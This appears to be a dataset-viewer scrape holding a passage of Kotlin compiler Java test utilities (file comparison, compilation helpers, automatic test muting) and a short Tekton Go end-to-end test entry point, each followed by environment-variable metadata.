//noinspection ConstantConditions
for (File childFile : file.listFiles()) {
if (childFile.getName().endsWith(".kt") || childFile.getName().endsWith(".kts")) {
ktFiles.add(loadJetFile(environment.getProject(), childFile));
}
}
}
}
JvmResolveUtil.analyze(ktFiles, environment);
}
public static void assertEqualsToFile(@NotNull Path expectedFile, @NotNull String actual) {
assertEqualsToFile(expectedFile.toFile(), actual);
}
public static void assertEqualsToFile(@NotNull File expectedFile, @NotNull String actual) {
assertEqualsToFile(expectedFile, actual, s -> s);
}
public static void assertEqualsToFile(@NotNull String message, @NotNull File expectedFile, @NotNull String actual) {
assertEqualsToFile(message, expectedFile, actual, s -> s);
}
public static void assertEqualsToFile(@NotNull File expectedFile, @NotNull String actual, @NotNull Function1<String, String> sanitizer) {
assertEqualsToFile("Actual data differs from file content", expectedFile, actual, sanitizer);
}
public static void assertEqualsToFile(@NotNull String message, @NotNull File expectedFile, @NotNull String actual, @NotNull Function1<String, String> sanitizer) {
try {
String actualText = StringUtilsKt.trimTrailingWhitespacesAndAddNewlineAtEOF(StringUtil.convertLineSeparators(actual.trim()));
if (!expectedFile.exists()) {
if (KtUsefulTestCase.IS_UNDER_TEAMCITY) {
Assert.fail("Expected data file " + expectedFile + " did not exist");
} else {
FileUtil.writeToFile(expectedFile, actualText);
Assert.fail("Expected data file did not exist. Generating: " + expectedFile);
}
}
String expected = FileUtil.loadFile(expectedFile, CharsetToolkit.UTF8, true);
String expectedText = StringUtilsKt.trimTrailingWhitespacesAndAddNewlineAtEOF(StringUtil.convertLineSeparators(expected.trim()));
if (!Objects.equals(sanitizer.invoke(expectedText), sanitizer.invoke(actualText))) {
throw new FileComparisonFailure(message + ": " + expectedFile.getName(),
expected, actual, expectedFile.getAbsolutePath());
}
}
catch (IOException e) {
throw ExceptionUtilsKt.rethrow(e);
}
}
public static boolean compileKotlinWithJava(
@NotNull List<File> javaFiles,
@NotNull List<File> ktFiles,
@NotNull File outDir,
@NotNull Disposable disposable,
@Nullable File javaErrorFile
) throws IOException {
return compileKotlinWithJava(javaFiles, ktFiles, outDir, disposable, javaErrorFile, null);
}
public static boolean compileKotlinWithJava(
@NotNull List<File> javaFiles,
@NotNull List<File> ktFiles,
@NotNull File outDir,
@NotNull Disposable disposable,
@Nullable File javaErrorFile,
@Nullable Function1<CompilerConfiguration, Unit> updateConfiguration
) throws IOException {
if (!ktFiles.isEmpty()) {
KotlinCoreEnvironment environment = createEnvironmentWithFullJdkAndIdeaAnnotations(disposable);
CompilerTestLanguageVersionSettingsKt.setupLanguageVersionSettingsForMultifileCompilerTests(ktFiles, environment);
if (updateConfiguration != null) {
updateConfiguration.invoke(environment.getConfiguration());
}
LoadDescriptorUtil.compileKotlinToDirAndGetModule(ktFiles, outDir, environment);
}
else {
boolean mkdirs = outDir.mkdirs();
assert mkdirs : "Not created: " + outDir;
}
if (javaFiles.isEmpty()) return true;
return compileJavaFiles(javaFiles, Arrays.asList(
"-classpath", outDir.getPath() + File.pathSeparator + ForTestCompileRuntime.runtimeJarForTests(),
"-d", outDir.getPath()
), javaErrorFile);
}
@NotNull
public static Directives parseDirectives(String expectedText) {
return parseDirectives(expectedText, new Directives());
}
@NotNull
public static Directives parseDirectives(String expectedText, @NotNull Directives directives) {
Matcher directiveMatcher = DIRECTIVE_PATTERN.matcher(expectedText);
while (directiveMatcher.find()) {
String name = directiveMatcher.group(1);
String value = directiveMatcher.group(3);
directives.put(name, value);
}
return directives;
}
public static List<String> loadBeforeAfterText(String filePath) {
String content;
try {
content = FileUtil.loadFile(new File(filePath), true);
}
catch (IOException e) {
throw new RuntimeException(e);
}
List<String> files = TestFiles.createTestFiles("", content, new TestFiles.TestFileFactoryNoModules<String>() {
@NotNull
@Override
public String create(@NotNull String fileName, @NotNull String text, @NotNull Directives directives) {
int firstLineEnd = text.indexOf('\n');
return StringUtil.trimTrailing(text.substring(firstLineEnd + 1));
}
});
Assert.assertTrue("Exactly two files expected: ", files.size() == 2);
return files;
}
public enum CommentType {
ALL,
LINE_COMMENT,
BLOCK_COMMENT
}
@NotNull
public static String getLastCommentInFile(@NotNull KtFile file) {
return CollectionsKt.first(getLastCommentsInFile(file, CommentType.ALL, true));
}
@NotNull
public static List<String> getLastCommentsInFile(@NotNull KtFile file, CommentType commentType, boolean assertMustExist) {
PsiElement lastChild = file.getLastChild();
if (lastChild != null && lastChild.getNode().getElementType().equals(KtTokens.WHITE_SPACE)) {
lastChild = lastChild.getPrevSibling();
}
assert lastChild != null;
List<String> comments = new ArrayList<>();
while (true) {
if (lastChild.getNode().getElementType().equals(KtTokens.BLOCK_COMMENT)) {
if (commentType == CommentType.ALL || commentType == CommentType.BLOCK_COMMENT) {
String lastChildText = lastChild.getText();
comments.add(lastChildText.substring(2, lastChildText.length() - 2).trim());
}
}
else if (lastChild.getNode().getElementType().equals(KtTokens.EOL_COMMENT)) {
if (commentType == CommentType.ALL || commentType == CommentType.LINE_COMMENT) {
comments.add(lastChild.getText().substring(2).trim());
}
}
else {
break;
}
lastChild = lastChild.getPrevSibling();
}
if (comments.isEmpty() && assertMustExist) {
throw new AssertionError(String.format(
"Test file '%s' should end in a comment of type %s; last node was: %s", file.getName(), commentType, lastChild));
}
return comments;
}
public static boolean compileJavaFiles(@NotNull Collection<File> files, List<String> options) throws IOException {
return compileJavaFiles(files, options, null);
}
private static boolean compileJavaFiles(@NotNull Collection<File> files, List<String> options, @Nullable File javaErrorFile) throws IOException {
return JvmCompilationUtils.compileJavaFiles(files, options, javaErrorFile, JUnit4Assertions.INSTANCE);
}
public static boolean compileJavaFilesExternallyWithJava9(@NotNull Collection<File> files, @NotNull List<String> options) {
return JvmCompilationUtils.compileJavaFilesExternally(files, options, KtTestUtil.getJdk9Home());
}
public static boolean compileJavaFilesExternally(@NotNull Collection<File> files, @NotNull List<String> options, @NotNull File jdkHome) {
return JvmCompilationUtils.compileJavaFilesExternally(files, options, jdkHome);
}
public static String navigationMetadata(@TestDataFile String testFile) {
return testFile;
}
public interface DoTest {
void invoke(@NotNull String filePath) throws Exception;
}
public static void runTest(@NotNull DoTest test, @NotNull TestCase testCase, @TestDataFile String testDataFile) throws Exception {
runTestImpl(testWithCustomIgnoreDirective(test, TargetBackend.ANY, IGNORE_BACKEND_DIRECTIVE_PREFIX), testCase, testDataFile);
}
public static void runTest(@NotNull TestCase testCase, @NotNull Function0<Unit> test) {
MuteWithDatabaseKt.runTest(testCase, test);
}
public static void runTestWithThrowable(@NotNull TestCase testCase, @NotNull RunnableWithThrowable test) {
MuteWithDatabaseKt.runTest(testCase, () -> {
try {
test.run();
}
catch (Throwable throwable) {
throw new IllegalStateException(throwable);
}
return null;
});
}
// In this test runner version the `testDataFile` parameter is annotated by `TestDataFile`.
// So only file paths passed to this parameter will be used in navigation actions, like "Navigate to testdata" and "Related Symbol..."
public static void runTest(DoTest test, TargetBackend targetBackend, @TestDataFile String testDataFile) throws Exception {
runTest0(test, targetBackend, testDataFile);
}
public static void runTestWithCustomIgnoreDirective(DoTest test, TargetBackend targetBackend, @TestDataFile String testDataFile, String ignoreDirective) throws Exception {
runTestImpl(testWithCustomIgnoreDirective(test, targetBackend, ignoreDirective), null, testDataFile);
}
// In this test runner version, NONE of the parameters are annotated by `TestDataFile`.
// So DevKit will use test name to determine related files in navigation actions, like "Navigate to testdata" and "Related Symbol..."
//
// Pro:
// * in most cases, it shows all related files including generated js files, for example.
// Cons:
// * sometimes, for too common/general names, it shows many variants to navigate
// * it adds an additional step for navigation -- you must choose an exact file to navigate
public static void runTest0(DoTest test, TargetBackend targetBackend, String testDataFilePath) throws Exception {
runTestImpl(testWithCustomIgnoreDirective(test, targetBackend, IGNORE_BACKEND_DIRECTIVE_PREFIX), null, testDataFilePath);
}
private static void runTestImpl(@NotNull DoTest test, @Nullable TestCase testCase, String testDataFilePath) throws Exception {
if (testCase != null && !isRunTestOverridden(testCase)) {
Function0<Unit> wrapWithMuteInDatabase = MuteWithDatabaseKt.wrapWithMuteInDatabase(testCase, () -> {
try {
test.invoke(testDataFilePath);
}
catch (Exception e) {
throw new IllegalStateException(e);
}
return null;
});
if (wrapWithMuteInDatabase != null) {
wrapWithMuteInDatabase.invoke();
return;
}
}
test.invoke(testDataFilePath);
}
private static boolean isRunTestOverridden(TestCase testCase) {
Class<?> type = testCase.getClass();
while (type != null) {
for (Annotation annotation : type.getDeclaredAnnotations()) {
if (annotation.annotationType().equals(WithMutedInDatabaseRunTest.class)) {
return true;
}
}
type = type.getSuperclass();
}
return false;
}
private static DoTest testWithCustomIgnoreDirective(DoTest test, TargetBackend targetBackend, String ignoreDirective) throws Exception {
return filePath -> {
File testDataFile = new File(filePath);
boolean isIgnored = isIgnoredTarget(targetBackend, testDataFile, ignoreDirective);
if (DONT_IGNORE_TESTS_WORKING_ON_COMPATIBLE_BACKEND) {
// Only ignore if it is ignored for both backends
// Motivation: this backend works => all good, even if compatible backend fails
// This backend fails, compatible works => need to know
isIgnored &= isIgnoredTarget(targetBackend.getCompatibleWith(), testDataFile);
}
try {
test.invoke(filePath);
}
catch (Throwable e) {
if (!isIgnored && AUTOMATICALLY_MUTE_FAILED_TESTS) {
String text = KtTestUtil.doLoadFile(testDataFile);
String directive = ignoreDirective + targetBackend.name() + "\n";
String newText;
if (text.startsWith("// !")) {
StringBuilder prefixBuilder = new StringBuilder();
int l = 0;
while (text.startsWith("// !", l)) {
int r = text.indexOf("\n", l) + 1;
if (r <= 0) r = text.length();
prefixBuilder.append(text.substring(l, r));
l = r;
}
prefixBuilder.append(directive);
prefixBuilder.append(text.substring(l));
newText = prefixBuilder.toString();
} else {
newText = directive + text;
}
if (!newText.equals(text)) {
System.err.println("\"" + directive + "\" was added to \"" + testDataFile + "\"");
FileUtil.writeToFile(testDataFile, newText);
}
}
if (RUN_IGNORED_TESTS_AS_REGULAR || !isIgnored) {
throw e;
}
if (PRINT_STACKTRACE_FOR_IGNORED_TESTS) {
e.printStackTrace();
} else {
System.err.println("MUTED TEST with `" + ignoreDirective + "`");
}
return;
}
if (isIgnored) {
if (AUTOMATICALLY_UNMUTE_PASSED_TESTS) {
String text = KtTestUtil.doLoadFile(testDataFile);
String directive = ignoreDirective + targetBackend.name();
String newText = Pattern.compile("^" + directive + "\n", Pattern.MULTILINE).matcher(text).replaceAll("");
if (!newText.equals(text)) {
System.err.println("\"" + directive + "\" was removed from \"" + testDataFile + "\"");
FileUtil.writeToFile(testDataFile, newText);
}
}
throw new AssertionError(String.format("Looks like this test can be unmuted. Remove \"%s%s\" directive.", ignoreDirective, targetBackend));
}
};
}
/**
* @return test data file name specified in the metadata of test method
*/
@Nullable
public static String getTestDataFileName(@NotNull Class<?> testCaseClass, @NotNull String testName) {
try {
Method method = testCaseClass.getDeclaredMethod(testName);
return KtTestUtil.getMethodMetadata(method);
}
catch (NoSuchMethodException e) {
throw new RuntimeException(e);
}
}
@NotNull
public static KtFile loadJetFile(@NotNull Project project, @NotNull File ioFile) throws IOException {
String text = FileUtil.loadFile(ioFile, true);
return KtPsiFactoryKt.KtPsiFactory(project).createPhysicalFile(ioFile.getName(), text);
}
@NotNull
public static List<KtFile> loadToJetFiles(@NotNull KotlinCoreEnvironment environment, @NotNull List<File> files) throws IOException {
List<KtFile> jetFiles = Lists.newArrayList();
for (File file : files) {
jetFiles.add(loadJetFile(environment.getProject(), file));
}
return jetFiles;
}
@NotNull
public static ModuleDescriptorImpl createEmptyModule() {
return createEmptyModule("<empty-for-test>");
}
@NotNull
public static ModuleDescriptorImpl createEmptyModule(@NotNull String name) {
return createEmptyModule(name, DefaultBuiltIns.getInstance());
}
@NotNull
public static ModuleDescriptorImpl createEmptyModule(@NotNull String name, @NotNull KotlinBuiltIns builtIns) {
return new ModuleDescriptorImpl(Name.special(name), LockBasedStorageManager.NO_LOCKS, builtIns);
}
@NotNull
public static File replaceExtension(@NotNull File file, @Nullable String newExtension) {
return new File(file.getParentFile(), FileUtil.getNameWithoutExtension(file) + (newExtension == null ? "" : "." + newExtension));
}
public static boolean isAllFilesPresentTest(String testName) {
//noinspection SpellCheckingInspection
return testName.toLowerCase().startsWith("allfilespresentin");
}
public static boolean isMultiExtensionName(@NotNull String name) {
int firstDotIndex = name.indexOf('.');
if (firstDotIndex == -1) {
return false;
}
// Several extension if name contains another dot
return name.indexOf('.', firstDotIndex + 1) != -1;
}
}
|
[
"\"JDK_16\""
] |
[] |
[
"JDK_16"
] |
[]
|
["JDK_16"]
|
java
| 1 | 0 | |
test/e2e/init_test.go
|
// Copyright © 2020 The Tekton Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package e2e
import (
"log"
"os"
"testing"
)
func TestMain(m *testing.M) {
validate()
log.Println("Running main e2e Test suite ")
v := m.Run()
os.Exit(v)
}
func validate() {
if env := os.Getenv("TEST_CLIENT_BINARY"); env == "" {
log.Println("\"TEST_CLIENT_BINARY\" env variable is required, Cannot Procced E2E Tests")
os.Exit(0)
}
}
|
[
"\"TEST_CLIENT_BINARY\""
] |
[] |
[
"TEST_CLIENT_BINARY"
] |
[]
|
["TEST_CLIENT_BINARY"]
|
go
| 1 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.